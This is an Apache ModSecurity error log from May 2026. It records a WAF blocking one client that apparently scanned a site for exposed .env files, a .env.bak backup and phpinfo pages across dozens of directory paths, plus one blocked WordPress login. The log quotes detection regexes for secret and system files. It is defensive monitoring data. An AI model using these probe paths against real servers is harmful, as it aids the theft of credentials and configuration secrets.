[Tue May 26 14:30:09.470579 2026] [security2:error] [pid 606909:tid 607128] [client 195.178.110.199:33030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/market/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV02wAAAN4"]
[Tue May 26 14:30:09.476279 2026] [security2:error] [pid 606909:tid 607123] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/marketing/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV03AAAANk"]
[Tue May 26 14:30:09.602230 2026] [security2:error] [pid 610693:tid 610937] [client 195.178.110.199:32972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/media/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvmwAAAHI"]
[Tue May 26 14:30:09.645426 2026] [security2:error] [pid 606909:tid 607092] [client 195.178.110.199:33016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node-api/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV04AAAALo"]
[Tue May 26 14:30:09.648976 2026] [security2:error] [pid 610693:tid 610864] [client 195.178.110.199:32890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/lms/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvngAAACk"]
[Tue May 26 14:30:09.656035 2026] [security2:error] [pid 610693:tid 610854] [client 195.178.110.199:33012] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvoAAAAB8"]
[Tue May 26 14:30:09.750824 2026] [security2:error] [pid 610693:tid 610865] [client 195.178.110.199:32988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/old/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvpAAAACo"]
[Tue May 26 14:30:09.789882 2026] [security2:error] [pid 606909:tid 607078] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/opt/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV05wAAAKw"]
[Tue May 26 14:30:09.850760 2026] [security2:error] [pid 606909:tid 607094] [client 195.178.110.199:33016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node/api/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV06AAAALw"]
[Tue May 26 14:30:09.854749 2026] [security2:error] [pid 610693:tid 610901] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node/backend/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvpwAAAE4"]
[Tue May 26 14:30:09.859876 2026] [security2:error] [pid 610693:tid 610846] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/nodeweb/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvqAAAABc"]
[Tue May 26 14:30:09.971094 2026] [security2:error] [pid 610693:tid 610863] [client 195.178.110.199:32890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/new/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvrgAAACg"]
[Tue May 26 14:30:10.016059 2026] [security2:error] [pid 610693:tid 610879] [client 195.178.110.199:32894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/nodeapi/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvsgAAADg"]
[Tue May 26 14:30:10.210283 2026] [security2:error] [pid 610693:tid 610838] [client 195.178.110.199:32902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/php.php"] [unique_id "ahVhGjvNO3hpmlY6M8RvuAAAAA8"]
[Tue May 26 14:30:10.242945 2026] [security2:error] [pid 610693:tid 610909] [client 195.178.110.199:33012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/phpinfo.php"] [unique_id "ahVhGjvNO3hpmlY6M8RvvAAAAFY"]
[Tue May 26 14:30:10.284532 2026] [security2:error] [pid 606909:tid 607143] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/portal/.env"] [unique_id "ahVhGl0yRtX9qA7aVUV09AAAAO0"]
[Tue May 26 14:30:10.317023 2026] [security2:error] [pid 610693:tid 610853] [client 195.178.110.199:32894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/php-info.php"] [unique_id "ahVhGjvNO3hpmlY6M8RvvwAAAB4"]
[Tue May 26 14:30:10.369717 2026] [security2:error] [pid 606909:tid 607039] [client 195.178.110.199:33030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/php_info.php"] [unique_id "ahVhGl0yRtX9qA7aVUV09wAAAIU"]
[Tue May 26 14:30:10.383281 2026] [security2:error] [pid 610693:tid 610930] [client 195.178.110.199:32972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/prod/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvwQAAAGs"]
[Tue May 26 14:30:10.392393 2026] [security2:error] [pid 606909:tid 607108] [client 195.178.110.199:33016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/product/.env"] [unique_id "ahVhGl0yRtX9qA7aVUV0-AAAAMo"]
[Tue May 26 14:30:10.434133 2026] [security2:error] [pid 606909:tid 607072] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/production/.env"] [unique_id "ahVhGl0yRtX9qA7aVUV0-gAAAKY"]
[Tue May 26 14:30:10.531428 2026] [security2:error] [pid 610693:tid 610891] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public-api/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvxAAAAEQ"]
[Tue May 26 14:30:10.637506 2026] [security2:error] [pid 610693:tid 610911] [client 195.178.110.199:32890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public_html/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvxwAAAFg"]
[Tue May 26 14:30:10.683074 2026] [security2:error] [pid 610693:tid 610871] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/qa/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvyQAAADA"]
[Tue May 26 14:30:10.727454 2026] [security2:error] [pid 606909:tid 607057] [client 195.178.110.199:33016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public/phpinfo.php"] [unique_id "ahVhGl0yRtX9qA7aVUV0_QAAAJc"]
[Tue May 26 14:30:10.817476 2026] [security2:error] [pid 610693:tid 610941] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/project/.env"] [unique_id "ahVhGjvNO3hpmlY6M8Rv0QAAAHY"]
[Tue May 26 14:30:11.003118 2026] [security2:error] [pid 610693:tid 610883] [client 195.178.110.199:32968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public/.env"] [unique_id "ahVhGzvNO3hpmlY6M8Rv3wAAADw"]
[Tue May 26 14:30:11.300038 2026] [security2:error] [pid 610693:tid 610851] [client 195.178.110.199:32968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/s3/.env.bak"] [unique_id "ahVhGzvNO3hpmlY6M8Rv7wAAABw"]
[Tue May 26 14:30:11.453498 2026] [security2:error] [pid 610693:tid 610888] [client 195.178.110.199:32952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/.env"] [unique_id "ahVhGzvNO3hpmlY6M8Rv9QAAAEE"]
[Tue May 26 14:30:11.478045 2026] [security2:error] [pid 610693:tid 610940] [client 195.178.110.199:32910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/api/.env"] [unique_id "ahVhGzvNO3hpmlY6M8Rv9wAAAHU"]
[Tue May 26 14:30:11.606157 2026] [security2:error] [pid 606909:tid 607045] [client 195.178.110.199:32936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/backend/.env"] [unique_id "ahVhG10yRtX9qA7aVUV1FAAAAIs"]
[Tue May 26 14:30:11.681407 2026] [security2:error] [pid 610693:tid 610729] [remote 95.216.117.13:57240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVhGzvNO3hpmlY6M8Rv-gAAOiM"]
[Tue May 26 14:30:11.713974 2026] [security2:error] [pid 610693:tid 610850] [client 195.178.110.199:32952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/service/.env"] [unique_id "ahVhGzvNO3hpmlY6M8RwCwAAABs"]
[Tue May 26 14:30:11.723007 2026] [security2:error] [pid 610693:tid 610835] [client 195.178.110.199:32968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/services/.env"] [unique_id "ahVhGzvNO3hpmlY6M8RwDQAAAAw"]
[Tue May 26 14:30:11.852834 2026] [security2:error] [pid 606909:tid 607141] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/shop/.env"] [unique_id "ahVhG10yRtX9qA7aVUV1GQAAAOs"]
[Tue May 26 14:30:11.955448 2026] [security2:error] [pid 610693:tid 610829] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/shared/.env"] [unique_id "ahVhGzvNO3hpmlY6M8RwHgAAAAY"]
[Tue May 26 14:30:11.992649 2026] [security2:error] [pid 610693:tid 610827] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/src/.env"] [unique_id "ahVhGzvNO3hpmlY6M8RwIwAAAAQ"]
[Tue May 26 14:30:12.157854 2026] [security2:error] [pid 610693:tid 610904] [client 195.178.110.199:32972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/srv/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwKQAAAFE"]
[Tue May 26 14:30:12.207201 2026] [security2:error] [pid 606909:tid 607144] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/staging/.env"] [unique_id "ahVhHF0yRtX9qA7aVUV1JAAAAO4"]
[Tue May 26 14:30:12.267315 2026] [security2:error] [pid 610693:tid 610941] [client 195.178.110.199:32910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stg/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwMAAAAHY"]
